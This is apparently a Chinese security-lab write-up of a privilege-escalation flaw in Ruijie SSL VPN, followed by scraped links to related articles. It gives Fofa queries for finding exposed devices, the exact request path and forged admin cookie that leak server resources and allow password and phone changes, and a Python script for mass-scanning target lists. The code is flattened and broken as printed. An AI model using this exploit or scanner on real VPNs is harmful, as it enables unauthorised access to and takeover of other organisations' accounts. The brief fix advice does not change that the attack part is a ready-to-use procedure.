Ruijie SSL V P N 垂直越权漏洞
Ruijie SSL V P N 垂直越权漏洞
——FARBS攻防实验室
目录
Ruijie SSL VPN 垂直越权漏洞
1、漏洞简介
2、漏洞影响
3、漏洞复现
4、漏洞批量检测
5、漏洞修复
1、漏洞简介
Ruijie SSL VPN 垂直越权漏洞,攻击者在已知用户名的情况下(默认adm,未知可Burp进行爆破),查看服务器资源,以及对账号进行修改密码和绑定手机操作。
2、漏洞影响
Ruijie SSL VPN
3、漏洞复现
3.1先通过Fofa等方式进行信息收集:
Fofa语法:icon_hash="884334722" || title="Ruijie SSL VPN"
收集其他信息(不忘谢谢客服小姐姐)
3.2访问目标: https://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=getrsc
3.3添加cookie认证信息:(UserName 参数为已知用户名)
Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
3.3.1用户名正确时会返回敏感信息:
3.3.2用户名未知时,可使用Burp进行用户名爆破:
3.4同样的可以进入控制界面,修改密码和绑定手机:
3.4.1访问页面:https://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres
3.4.2点击个人设置跳转页面即可修改账号信息
4、漏洞批量检测
Python-Poc:
#!/usr/bin/python
# -*- coding:utf-8
import re,sys,requests,time,colorama
from colorama import *
init(autoreset=True)findContent ="主机和子网资源"
payload ="/cgi-bin/main.cgi?oper=getrsc"
headers={"cookie":"UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1"}def main():try:requests.packages.urllib3.disable_warnings()response=requests.get(urls+payload,headers=headers,timeout=5,verify=False)res = response.content.decode('GBK')if res.find(findContent) != -1:print('\033[1;32;40m[+]'+urls+"存在锐捷vpn垂直越权漏洞");else:print('\033[1;31;40m[-]'+urls+"不存在锐捷vpn垂直越权漏洞")except:print('{} 请求超时'.format(urls))if __name__ == '__main__':if len(sys.argv)!=2:print('用法:python Ruijie_SSL_VPN_unauthorized.py urls.txt')else:file = open(sys.argv[1])for url in file.readlines():urls=url.strip()if urls[-1]=='/':urls=urls[:-1]main()time.sleep(1)print ('\033[1;33;40m检测完毕!')
5、漏洞修复
1、修改较为复杂的用户名(不推荐,为防止爆破用户名应设置访问限制);
2、更新最新版控制台。
Ruijie SSL V P N 垂直越权漏洞相关推荐
- 还在人工测越权漏洞?快来自动扫描吧!
前言 关于越权漏洞,大家都熟知水平越权.垂直越权.未授权访问,此处不再赘述概念了. 对于越权类漏洞的测试,通用的测试方法,也都是人工通过代理抓包工具截获报文,然后尝试删除Cookie测试是否存在访问越 ...
- 漏洞防御方案_越权漏洞原理及防御方案
一.漏洞描述 越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广.危害大,被OWASP列为Web应用十大安全隐患的第二名. 该漏洞是指 ...
- Pikachu靶场之越权漏洞详解
Pikachu靶场之越权漏洞详解 前言 逻辑越权漏洞简述 漏洞描述 漏洞原因 漏洞分类 水平越权 垂直越权 权限框架缺陷 如何防御 第一关 水平越权 问题分析 尝试防御 第二关 垂直越权 问题分析 尝 ...
- SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
漏洞总结篇 SQL注入 什么是SQL注入? 怎么防御? 过滤特殊字符 修改php.in 使用mysqli_real_escape_string()函数 加固数据库方面 加固管理方面 Mybatis 防 ...
- Web安全—逻辑越权漏洞(BAC)
逻辑越权漏洞 漏洞分类:逻辑越权漏洞属于漏洞分类中的服务端漏洞,属于权限控制类漏洞 漏洞简介: 越权漏洞是比较常见的漏洞类型,通常分为两种类型,垂直和水平越权,简单可以理解为,在修改某个用作身份标识的 ...
- 水平越权访问与垂直越权访问漏洞
目录 前言 越权访问漏洞 水平越权访问漏洞 垂直越权访问漏洞 防范措施 前言 电网机巡智能管控平台是XX省电力巡检智能管控平台,辅助全省无人机巡线作业工作顺利.高效开展.由于今年互联网出现了严重的安全 ...
- 渗透测试-越权漏洞之垂直越权和水平越权
越权漏洞之垂直越权和水平越权 文章目录 越权漏洞之垂直越权和水平越权 前言 一.什么是越权漏洞以及漏洞产生的原因 1. 什么是越权漏洞 2. 漏洞产生的原因 二.水平越权和垂直越权以及防御方法 1.水 ...
- 业务逻辑漏洞之水平越权和垂直越权
越权漏洞原理 浏览器对用户提交的数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能. 越权漏洞被分为两类 一类是水平越权,一类是垂直越权. 水平越权 :用户在权限相同级别下的 ...
- WEB攻防-通用漏洞水平垂直越权购买逻辑漏洞
目录 水平垂直越权 水平越权 垂直越权 访问控制原理 漏洞判别 防护 购买逻辑漏洞 知识点 详细介绍 防护 案例演示-优惠券 案例演示-CMS-订单修改 水平垂直越权 水平越权 同级用户权限共享--- ...
- 逻辑越权漏洞-水平垂直越权
越权访问漏洞 越权访问(Broken Access Contrlo简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广,危害大在2019年OWASP列为Web应用中十大安全隐患第二名 该漏洞 ...
最新文章
- PLSQL的DBMS_GETLINE
- python 复制、移动文件到指定目录并修改名字
- ansible roles和django项目的整合
- 关于牛客网运行超时的原因分析
- CSV格式数据如何导入MySQL?
- codeforces1453 E. Dog Snacks
- python autohotkey_PyAutoGUI-python版的autoit/AHK
- 易语言mysql验证_易语言MySql注册登录
- 2021数字化就业新职业新岗位研究报告
- GNU make manual 翻译(四十二)
- C# 读取txt文本数据
- 转载】Unity3D美术方面贴图蓄力帖(值得珍藏学习)
- QCC3x系列蓝牙芯片
- 测试网速和网站加载的速度 - Speedtest by Ookla
- Linux 应用调试神器- ASan
- usb热插拔多次之后无法识别
- MTK芯片技术资料大全,各个型号都有,包括原理图数据表等
- 解决Android studio 模拟器闪烁黑屏问题
- html调用头尾html,合并html头尾 - 基础支持 - 用gulp搭建前后分离的开发环�? - KK的小故事...
- MPU6500驱动调试笔记(STM32F407+SPI)